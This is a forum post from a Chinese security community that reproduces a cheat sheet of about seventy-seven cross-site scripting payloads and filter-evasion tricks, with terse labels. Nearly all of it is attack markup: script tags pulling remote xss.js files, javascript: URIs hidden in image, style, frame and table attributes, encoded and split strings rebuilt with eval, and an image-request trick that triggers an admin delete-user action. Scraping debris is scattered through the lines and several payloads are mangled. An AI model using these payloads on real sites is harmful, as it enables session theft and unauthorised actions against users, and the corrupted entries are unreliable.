找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2704|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
& w' }6 `7 \) C9 p(1)普通的XSS JavaScript注入) A) C1 L" ^" E' |
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& i  W0 w. |% h  e4 G; {2 r8 Q(2)IMG标签XSS使用JavaScript命令
- f2 ]- x. Q- A1 [7 ^( T" X2 `<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; _; \& Y7 Q/ A0 i! C
(3)IMG标签无分号无引号
, e( ?# f) z1 X9 P, g5 Q<IMG SRC=javascript:alert(‘XSS’)>
; M1 z: `& M) V- Y& f( T(4)IMG标签大小写不敏感! b. p6 I1 P5 x- H2 b; P; `* H
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>: ]$ T5 ?* A( A" J
(5)HTML编码(必须有分号)3 d, J7 d& S# M, ^$ |
<IMG SRC=javascript:alert(“XSS”)>( n5 X, `+ u) z/ K
(6)修正缺陷IMG标签
. B( U) n; n% _: ^5 h<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
( E/ T4 N& j; \" Q
# o7 L: r6 a# Y6 ~: C, B: T; O9 E" G; P
(7)formCharCode标签(计算器)
* i. t4 t, y: L" S- V8 s<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
" @7 w: w  H3 [0 i. q8 _( w(8)UTF-8的Unicode编码(计算器). e+ J' M) w+ ]  [' a& N
<IMG SRC=jav..省略..S')>
6 ~! y: C  m8 e) O7 `4 a2 D(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
  W; q+ m& S7 a<IMG SRC=jav..省略..S')>
8 N2 b* f- h0 l  M5 Z% r4 w(10)十六进制编码也是没有分号(计算器)
1 G) w4 W6 k3 [" u9 w5 D<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>$ L, }9 B3 B$ [: Q4 P+ I& I4 J
(11)嵌入式标签,将Javascript分开
: U' q6 V% |) p  G5 ]<IMG SRC=”jav ascript:alert(‘XSS’);”>
( L1 O% t. s2 @! z% e(12)嵌入式编码标签,将Javascript分开3 `4 l( s/ O# s+ y0 u8 o: ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: G7 q0 q# N5 s) T(13)嵌入式换行符
7 U. ?2 F; ~: W<IMG SRC=”jav ascript:alert(‘XSS’);”>
# p$ G, i8 s$ o3 p! O, y9 ]( k9 T(14)嵌入式回车$ [) `  K" ~3 `5 X
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ o, T1 l( i: C, W0 [4 T7 q(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 a! ^6 S( f$ {/ c) a9 h# N: }<IMG SRC=”javascript:alert(‘XSS‘)”>& V1 r9 u7 ~& j2 x) D1 t
(16)解决限制字符(要求同页面)+ y9 i0 T3 w/ i  R0 e0 B' L
<script>z=’document.’</script>4 r/ J7 f* a- M  r* h
<script>z=z+’write(“‘</script>
0 M/ m5 ^% _7 X% x, z9 Q, v6 L<script>z=z+’<script’</script>1 U) m" s( |5 G3 W9 N
<script>z=z+’ src=ht’</script>
! w0 i/ W5 ~# }& I, ^1 x  ?<script>z=z+’tp://ww’</script>
2 _# \8 A* l8 W) h# o4 O& T, i<script>z=z+’w.shell’</script>
8 k/ t+ ~: h/ x6 C3 ?' J: Z  g<script>z=z+’.net/1.’</script>
& g. g6 X$ c) Y( {<script>z=z+’js></sc’</script>
* `! l7 Y$ [, P8 ~8 S5 f+ W! h<script>z=z+’ript>”)’</script>
5 x3 Y: B' M& F4 s! s<script>eval_r(z)</script>
5 `; K4 {% n, d& c4 r$ l6 P(17)空字符12-7-1 T00LS - Powered by Discuz! Board
+ W; w0 {5 m' ~8 B) Qhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
" Y! T& H; V. k1 E% e( Gperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
7 x5 P) N. D" v  [+ G7 \6 C(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用; `5 m3 V+ A) R& `3 ~
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out$ t* e+ U8 j$ G: m  w
(19)Spaces和meta前的IMG标签) v; S; ~& @6 }8 C, y6 ~3 o
<IMG SRC=” javascript:alert(‘XSS’);”>% H6 c% k% H+ C7 \
(20)Non-alpha-non-digit XSS' l+ C9 D7 Y4 x* f4 ^; R" Z
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& q) @- \# M5 J; c# }, V3 {(21)Non-alpha-non-digit XSS to 2" \  C7 H1 f8 v
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
+ u( d/ a9 s* }: O9 `  a(22)Non-alpha-non-digit XSS to 32 k: C" }/ Y1 C0 l. f+ F
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* t  i* `$ l" p7 t2 {
(23)双开括号' \! n" C% t; `" I8 d' x! x
<<SCRIPT>alert(“XSS”);//<</SCRIPT>2 W$ m& D6 q( S" E+ ~# O/ Y& J
(24)无结束脚本标记(仅火狐等浏览器)
4 l2 K% w1 c/ |+ `( @<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* G  R% `* E+ M5 G5 O
(25)无结束脚本标记2  u4 M0 T* H( P( g
<SCRIPT SRC=//3w.org/XSS/xss.js>
) S& w8 i% `/ \# p" O+ o  F: }(26)半开的HTML/JavaScript XSS
+ p6 I) _2 o2 y$ [& |<IMG SRC=”javascript:alert(‘XSS’)”
' o! f2 p6 p6 D4 s6 S(27)双开角括号& P, _) m* J( v# K; A
<iframe src=http://3w.org/XSS.html <0 x% r5 x3 f! r% U6 k# m4 T. Y
(28)无单引号 双引号 分号# V: O; K0 B% o( `1 p2 G
<SCRIPT>a=/XSS// h9 H8 Z0 [! {
alert(a.source)</SCRIPT>0 P1 }. q4 F5 r" a# L7 D( y% E
(29)换码过滤的JavaScript* C0 Y4 Y) e- W& u3 `$ [) V
\”;alert(‘XSS’);//
3 ?% f, Q8 U( d+ u! ^: O6 j(30)结束Title标签
' _9 s+ I* r; R& c$ M/ ?* Y9 H</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& v6 l. C  M* Q$ q0 Z3 m7 e(31)Input Image# Z2 m* N0 O* r5 u; V
<INPUT SRC=”javascript:alert(‘XSS’);”>
- \! Y! j1 q( e- S9 F8 Y# x6 x(32)BODY Image. b$ ~. k/ @) r8 ?" q$ Q2 c9 \
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
6 X" Z4 h' a/ [& A/ q. W* Q6 _(33)BODY标签9 l2 d: s* N3 L/ ^9 c
<BODY(‘XSS’)>
) V6 s0 t7 p+ L& c(34)IMG Dynsrc
) d! W0 f& w- B% i9 Q# g( l<IMG DYNSRC=”javascript:alert(‘XSS’)”>; P' S7 R1 Y) c  R2 w5 N
(35)IMG Lowsrc
3 h. r( x" Y2 f( @: o* {; w<IMG LOWSRC=”javascript:alert(‘XSS’)”>0 H7 [5 ^0 ~/ e% |6 ]% a4 b
(36)BGSOUND* o- x) x4 H/ b" f. B. r
<BGSOUND SRC=”javascript:alert(‘XSS’);”>5 h0 ^- l; n4 i) }/ `& {
(37)STYLE sheet
4 _2 p- i8 d8 |  s' ^5 ?2 M<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, S+ z! `- G: Z% B+ Y0 J( n
(38)远程样式表# O0 n  Z3 \& c, a6 T0 Q. R
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>; ~. \7 ~4 Q: }
(39)List-style-image(列表式)) C/ a! [9 L" v& \' b5 }
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS. F* o6 c  K% a8 T+ ?0 L
(40)IMG VBscript, I! I0 R8 V- t! \# W4 T. q1 o4 [
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS3 H# O% @; n  {7 X' ?# P9 g
(41)META链接url3 w! ?8 g) U8 J3 {. W

+ V: W' o  }1 w6 G, N- s& q+ _! a8 A! K
<META HTTP-EQUIV=”refresh” CONTENT=”0;
, }2 K0 ^- {) OURL=http://;URL=javascript:alert(‘XSS’);”>6 f8 M- {' y- h7 w
(42)Iframe
5 m7 y- T$ v: w  n1 a2 ]) b; U<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>  e6 c! v, l: }: P+ H9 J& _
(43)Frame: y' u7 r7 d% _$ m. q) y5 {
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
* a7 ^7 P+ B0 Whttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
+ M6 }# _5 X* ~; @/ U8 T% E6 S# r(44)Table
0 n1 U' j! G0 [, m<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>5 f* H7 k' f. u. r* g& I5 S
(45)TD
4 V3 ^- N" k6 z; Q  o+ s. w<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>; x% N, c' _1 ~3 E' p( T
(46)DIV background-image
  x& r1 r$ h  C<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
6 z- H# N" f5 @, u. B, y(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-) T% Q& ?: d. h5 g" S9 g  W; Q
8&13&12288&65279)
  b/ T! e7 ?% [6 m<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
7 N* M/ G$ S9 Y3 f1 D4 D4 Y* [(48)DIV expression
, |* ]& @1 D$ \. j<DIV STYLE=”width: expression_r(alert(‘XSS’));”>. ^4 S* b: b' m
(49)STYLE属性分拆表达
7 v* r* f4 R. {( n2 J+ g% `<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>/ v. n& n4 A3 T0 v6 @
(50)匿名STYLE(组成:开角号和一个字母开头)
# s3 ~# r) G7 U' Z9 U- [' O<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 Z) B+ [9 \& [- G& e2 M
(51)STYLE background-image3 n, d3 s6 F% E7 r/ I' c
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A7 N9 M! M" P: }" V$ s2 \
CLASS=XSS></A>
2 A, O! r: N, f(52)IMG STYLE方式
" T. r. @" Z6 ~1 P" F- K3 Rexppression(alert(“XSS”))’>& p4 i6 G! }; k# n- E  M
(53)STYLE background; L* o- z  \/ R, E
<STYLE><STYLE# K6 }: ~% g, `/ Z- f
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
& Z. m3 D. A9 u(54)BASE
2 j0 D/ ]  F0 z* F/ L+ ?: M4 c<BASE HREF=”javascript:alert(‘XSS’);//”>& y+ A: A% @7 r3 h8 A
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
9 F8 e7 R/ J  [' v( i0 t5 x<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
" W) k8 k6 j$ g0 ~( L" f* ?9 V0 q(56)在flash中使用ActionScrpt可以混进你XSS的代码- q8 J! `, h6 E/ Q$ l% N
a=”get”;. o- z- i& `5 d
b=”URL(\”";0 Z( K$ c3 a. g5 @& |3 [
c=”javascript:”;
* d. M+ }/ n  x% jd=”alert(‘XSS’);\”)”;7 l+ w( R  D2 I0 E0 A4 W6 T
eval_r(a+b+c+d);
0 i, d1 d# e" i5 R4 G(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
+ T4 {- {* m5 n+ C% U<HTML xmlns:xss>& s( C% b7 [6 k' T: I
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>( i0 C; N5 R2 q- p# j  Q3 f; @
<xss:xss>XSS</xss:xss>
( n7 A' B9 Y% ]4 @5 W5 V1 Z* l</HTML>
* A3 }/ A7 U" ]0 q, _; ?8 o1 Q" T(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
  n9 ?" u1 f$ B1 N0 p<SCRIPT SRC=””></SCRIPT>
1 Y% c$ q8 E6 K4 j; S(59)IMG嵌入式命令,可执行任意命令* d! o( S* L6 O9 B8 O! E5 G
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
3 Y% H  f7 e: D7 W  }. j3 G2 y- Q(60)IMG嵌入式命令(a.jpg在同服务器)' _. Z' F  j& L) v& q
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser* a% k+ t9 Q+ v& E
(61)绕符号过滤
) M3 f: I! F' B6 t<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>% y/ w4 [. k6 U/ M" O! f! O. C
(62)
# k8 I) ^# X- t& a<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 }9 m9 |% |; Z# S7 p+ x3 o(63)2 i7 V, f$ Z5 R( c1 }& G8 G5 x/ H
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>% R$ i8 G. N; ?  ~& P4 G7 T- n
(64)6 F; `1 x+ O- v
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>1 ?* L4 d2 H; U; n4 C
(65)4 K: T/ W. p- |5 t( D2 C& h
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT># [- [8 I- s" |* G! x
(66)12-7-1 T00LS - Powered by Discuz! Board/ j4 A% l8 G2 ]: g  W1 n
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
/ D" ?; F$ z( O, B( O<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
& V) _0 r1 ~: G+ v(67)% B+ w) O- G" v: d- U' K
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>. @) G/ M$ |; X0 y
</SCRIPT>
; v& z/ B! D" }8 B& S7 T$ V8 a(68)URL绕行
0 X- i* @6 B3 L  b; V/ V4 r<A HREF=”http://127.0.0.1/”>XSS</A>
' l$ j- k$ I9 H) F5 W2 K8 T(69)URL编码* @4 {4 [+ W$ P' k) q
<A HREF=”http://3w.org”>XSS</A>
* d: }; k5 r0 ?' A2 ~+ g(70)IP十进制5 `+ Y$ @3 [7 L" |6 _
<A HREF=”http://3232235521″>XSS</A>
; ^- x5 k( L. I/ U6 J* J: U5 d0 x(71)IP十六进制
( }. U4 y3 d$ s! M% N+ r<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 h6 S0 n, u9 v8 g% R  m& n(72)IP八进制
0 E8 p. c  `5 I  Z<A HREF=”http://0300.0250.0000.0001″>XSS</A>
1 U4 b+ Y( h) X6 g6 Y(73)混合编码, |4 E4 b: T  B$ G2 _
<A HREF=”h: D( P- v" e* A) D$ ^; ~( `
tt p://6 6.000146.0×7.147/”">XSS</A>
2 @- D0 {: }( a, D* z(74)节省[http:]( b8 \" ~% @5 B5 W
<A HREF=”//www.google.com/”>XSS</A>
2 Q. |6 r( z7 }: u4 l+ i6 N. i(75)节省[www]
' V# ]# K6 G. g, D8 G<A HREF=”http://google.com/”>XSS</A>
- f" I/ D( u. t, I  T( h6 k4 o0 Z(76)绝对点绝对DNS: c1 \! R5 ?; A
<A HREF=”http://www.google.com./”>XSS</A>
8 h* h  t: s! M2 N6 q(77)javascript链接6 P( B4 g' k. C6 ^4 t3 |9 ~2 c
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>& j2 e9 n  e: k: a) w8 G5 J

( Y  d1 Y! K% P- W+ O, [  {5 p% ~原文地址:http://fuzzexp.org/u/0day/?p=14
! @' ?: a, \: `/ c7 f5 `+ A7 E# I0 C! c& i8 Y  e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表